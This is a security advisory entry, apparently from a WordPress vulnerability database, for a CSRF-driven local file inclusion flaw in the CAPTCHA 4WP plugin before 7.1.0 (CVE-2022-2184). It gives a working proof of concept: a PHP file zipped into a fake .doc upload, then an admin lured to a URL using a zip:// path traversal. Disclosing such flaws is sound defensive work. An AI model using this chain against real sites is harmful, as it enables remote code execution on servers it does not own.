CAPTCHA 4WP < 7.1.0 – Local File Inclusion via CSRF | CVE 2022-2184 | Plugin Vulnerabilities

Description

The plugin lets user input reach a sensitive require_once call in one of its admin-side templates. This can be abused by attackers, via a Cross-Site Request Forgery attack to run arbitrary code on the server.

Proof of Concept

1) Create a malicious PHP script
$ echo '<?php phpinfo();' > shell.php

2) Add it to a fake .doc file, who will actually be a zip file
$ zip malicious.doc shell.php

3) While logged-in as an Author, upload the "doc" file via WP's media gallery.

4) Have an administrator visit the following URL:

httsp://example.com/wp-admin/admin.php?page=c4wp-admin-help&tab=zip://../wp-content/uploads/2022/06/malicious.doc%23shell

Affects Plugins

advanced-nocaptcha-recaptcha

Fixed in 7.1.0

References

CVE

Classification

Type

LFI

OWASP top 10

CWE

CVSS

Miscellaneous

Original Researcher

ZhongFu Su(JrXnm) of WuHan University

Submitter

ZhongFu Su(JrXnm) of WuHan University

Submitter website

https://blog.szfszf.top

Submitter twitter

Verified

Yes

WPVDB ID

e777784f-5ba0-4966-be27-e0a0cbbfe056

Timeline

Publicly Published

2022-07-11 (about 3 years ago)

Added

2022-07-11 (about 3 years ago)

Last Updated

2023-04-11 (about 2 years ago)

Other

Published

Title

Published

2023-11-20

Title

CataBlog <= 1.7.0 - Authenticated (Editor+) Arbitrary File Deletion

Published

2017-02-10

Title

Javo Spot Premium Theme - Unauthenticated Directory Traversal

Published

2024-12-17

Title

WPLMS < 1.9.9.5.2 - Authenticated (Contributor+) Arbitrary Directory Deletion

Published

2025-05-21

Title

Hot Random Image < 1.9.3 - Path Traversal to Authenticated (Contributor+) Limited Arbitrary Image Access via path Parameter

Published

2025-03-06

Title

CS Framework < 7.1 - Authenticated (Subscriber+) Arbitrary File Deletion